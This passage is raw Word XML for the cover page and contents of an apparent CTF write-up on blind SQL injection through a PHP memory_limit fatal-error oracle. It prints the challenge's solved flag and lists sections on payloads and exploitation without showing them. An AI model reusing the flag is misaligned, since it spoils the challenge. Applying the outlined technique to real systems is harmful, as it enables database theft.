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Look w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="16838" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="0c1f1a"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:left w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:before="4092"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:color="3ddbb5" w:sz="6" w:space="8"/>
              </w:pBdr>
              <w:spacing w:after="500"/>
              <w:ind w:right="800" w:left="1200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="3ddbb5"/>
                <w:spacing w:val="40"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">W  E  B     /  /     B  L  I  N  D     S  Q  L  I</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="100" w:line="920" w:lineRule="atLeast"/>
              <w:ind w:left="1200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="80"/>
                <w:szCs w:val="80"/>
              </w:rPr>
              <w:t xml:space="preserve">NO TIMING</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="300" w:line="920" w:lineRule="atLeast"/>
              <w:ind w:left="1200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="80"/>
                <w:szCs w:val="80"/>
              </w:rPr>
              <w:t xml:space="preserve">ATTACK!!</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="800" w:line="340" w:lineRule="atLeast"/>
              <w:ind w:right="800" w:left="1200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                <w:color w:val="b0b8c0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Blind SQL Injection via a PHP memory_limit Fatal Oracle</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:left w:val="single" w:color="3ddbb5" w:sz="8" w:space="12"/>
              </w:pBdr>
              <w:spacing w:after="80"/>
              <w:ind w:left="1400"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="90989f"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Author     : 0xnhsec</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:left w:val="single" w:color="3ddbb5" w:sz="8" w:space="12"/>
              </w:pBdr>
              <w:spacing w:after="80"/>
              <w:ind w:left="1400"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="90989f"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Target     : chall.ctf.ae (PHP 8 + mysqli, rotating instance)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:left w:val="single" w:color="3ddbb5" w:sz="8" w:space="12"/>
              </w:pBdr>
              <w:spacing w:after="80"/>
              <w:ind w:left="1400"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="90989f"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Final flag : pwnsec{9f5b1c7f391035d1}</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:left w:val="single" w:color="3ddbb5" w:sz="8" w:space="12"/>
              </w:pBdr>
              <w:spacing w:after="80"/>
              <w:ind w:left="1400"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="90989f"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Date       : 13 September 2026</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:before="4092"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:top w:val="single" w:color="3ddbb5" w:sz="2" w:space="8"/>
              </w:pBdr>
              <w:spacing w:before="200"/>
              <w:ind w:right="800" w:left="1200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New"/>
                <w:color w:val="687078"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">CHAL.CTF.AE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New"/>
                <w:color w:val="687078"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">                                        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New"/>
                <w:color w:val="687078"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">FILE: SAMPLE.PHP</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
        <w:sectPr>
          <w:footnotePr/>
          <w:endnotePr/>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="16838" w:orient="portrait" w:w="11906"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="0" w:left="0" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:num="1" w:sep="0" w:space="1701" w:equalWidth="1"/>
        </w:sectPr>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="360" w:before="480" w:line="380" w:lineRule="atLeast"/>
        <w:ind/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0f2e24"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Table of Contents"/>
        <w15:appearance w15:val="boundingBox"/>
        <w:rPr/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:pBdr/>
            <w:spacing/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">TOC \h \o "1-2"</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="757"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100000" w:anchor="_Toc100000" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Executive Summary</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100000 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="757"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100001" w:anchor="_Toc100001" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Challenge Overview and Environment Recon</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100001 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="757"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100002" w:anchor="_Toc100002" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Source Code Analysis: Three Closed Channels</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100002 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="758"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind w:left="360"/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100003" w:anchor="_Toc100003" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">3.1 The Injection Point and a Deliberately Silent Output</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100003 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="758"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind w:left="360"/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100004" w:anchor="_Toc100004" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">3.2 The 2.0-Second Response Pad</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100004 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="757"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100005" w:anchor="_Toc100005" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Dead Ends: Killing the Timing Channel</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100005 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="757"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100006" w:anchor="_Toc100006" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">5. The Memory Oracle</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100006 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="758"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind w:left="360"/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100007" w:anchor="_Toc100007" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">5.1 From Timing to Allocation Size</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100007 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="758"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind w:left="360"/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100008" w:anchor="_Toc100008" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">5.2 Payload Anatomy</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100008 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="758"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind w:left="360"/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100009" w:anchor="_Toc100009" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3 Decoding: One Request, One Full Character</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100009 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="757"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100010" w:anchor="_Toc100010" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">6. Exploitation Pipeline</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100010 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="758"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind w:left="360"/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100011" w:anchor="_Toc100011" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">6.1 Oracle Primitives</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100011 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="758"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind w:left="360"/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100012" w:anchor="_Toc100012" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">6.2 Engineering Choices That Made It Practical</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100012 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="757"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100013" w:anchor="_Toc100013" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">7. Results and Verification</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100013 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="757"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100014" w:anchor="_Toc100014" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">8. Why the Defense Failed</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100014 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">11</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="757"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100015" w:anchor="_Toc100015" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">9. Mitigations and Hardening Recommendations</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100015 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="757"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100016" w:anchor="_Toc100016" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">10. Appendices</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100016 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">13</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="758"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind w:left="360"/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100017" w:anchor="_Toc100017" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">10.1 Appendix A: Payload Reference</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100017 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">13</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="758"/>
            <w:pBdr/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
            <w:spacing w:after="60" w:before="120"/>
            <w:ind w:left="360"/>
            <w:rPr/>
          </w:pPr>
          <w:r/>
          <w:hyperlink w:tooltip="#_Toc100018" w:anchor="_Toc100018" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="750"/>
              </w:rPr>
              <w:t xml:space="preserve">10.2 Appendix B: Session Timeline</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc100018 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">14</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r/>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pBdr/>
            <w:spacing/>
            <w:ind/>
            <w:rPr/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r/>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:before="200" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>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r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br w:type="page" w:clear="all"/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="default" r:id="rId10"/>
          <w:footnotePr/>
          <w:endnotePr/>
          <w:type w:val="nextPage"/>
